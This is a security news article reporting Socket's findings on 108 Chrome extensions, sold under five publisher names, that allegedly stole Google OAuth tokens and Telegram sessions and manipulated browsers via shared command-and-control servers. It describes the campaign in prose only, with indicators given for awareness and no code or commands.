Reports from security researchers at Socket describe a coordinated set of activity involving Chrome Web Store extensions that are alleged to have been used for data theft and browser manipulation. According to the analysis, 108 extensions were identified as part of the same broader campaign, with functionality spanning legitimate-looking tools while simultaneously carrying out hidden malicious operations. The extensions are said to be distributed under several publisher identities and collectively represent a relatively small but targeted install base of roughly 20,000 users.
Scope and Distribution of the Extensions
The extensions linked to this campaign are described as covering a wide range of categories, including messaging-related tools for platforms such as Telegram, video-related utilities for YouTube and TikTok, translation services, and even browser games such as slot-style applications.
Socket’s findings indicate that the extensions are associated with five publisher identities, including Yana Project, GameGen, SideGames, Rodeo Games, and InterAlt. Despite differing branding and categories, the underlying infrastructure and behavior are reported to be consistent across the set.
Data Theft and Browser Abuse
The analysis describes multiple mechanisms allegedly used by the extensions to extract sensitive user data. A major focus is placed on Google account authentication data, where a significant subset of extensions is reported to intercept OAuth2 tokens and retrieve user profile information such as email addresses, names, and profile images.
Another highlighted component involves Telegram Web sessions. One extension in particular, described as “Telegram Multi-account,” is reported to extract active session tokens from the browser and transmit them at frequent intervals to external servers. This would, in theory, allow continued access to messaging data without requiring additional authentication steps.
Beyond account-related theft, additional behaviors are described across subsets of the extensions. These include functionality that opens arbitrary URLs when the browser starts, injects advertising content into visited pages, and modifies browsing behavior through background scripts. Socket also notes that some extensions appear capable of running commands issued remotely, affecting browser behavior even when the user is not actively interacting with the extension interface.
Shared Infrastructure and Attribution Observations
A key point raised in the report is the apparent centralization of backend infrastructure. The extensions are said to communicate with shared command-and-control systems, including a server referenced as cloudapi[.]stream and an IP address identified as 144.126.135.238. Researchers suggest that this shared backend indicates coordination across all 108 extensions rather than isolated incidents. The list of affected extensions can be found here.
Socket also reports that multiple extensions contain comments in Russian within their source code, although no definitive attribution is provided regarding the operators behind the infrastructure. The activity has been described in research terms as potentially consistent with a malware-as-a-service model, where stolen session data and identities may be monetized or redistributed.
User Exposure and Security Implications
According to the analysis, the impact of the extensions varies depending on their function, but the central concern is unauthorized access to authenticated sessions and personal identity data. In cases involving Google accounts, intercepted OAuth tokens may allow persistent identification of users. In cases involving Telegram Web, stolen session data may enable access to messages and contacts tied to active sessions.
Other described risks include persistent browser-level control, unsolicited navigation triggered on startup, and content injection into visited websites, which could alter the browsing environment without user awareness.
Socket notes that despite takedown requests, a number of the extensions reportedly remained accessible at the time of reporting, and that affected users may need to review connected application permissions and active sessions depending on what services were used.
Conclusion
The reported campaign highlights concerns around browser extensions functioning as covert data collection tools under the appearance of normal utility applications. With shared infrastructure, multiple publisher identities, and overlapping malicious behaviors, the activity described by Socket points to a coordinated ecosystem rather than isolated abuse cases. While attribution remains uncertain, the findings underscore how extension-based ecosystems can be leveraged for persistent session theft, identity collection, and remote browser manipulation when supply chain controls are weak or delayed.
0 Comments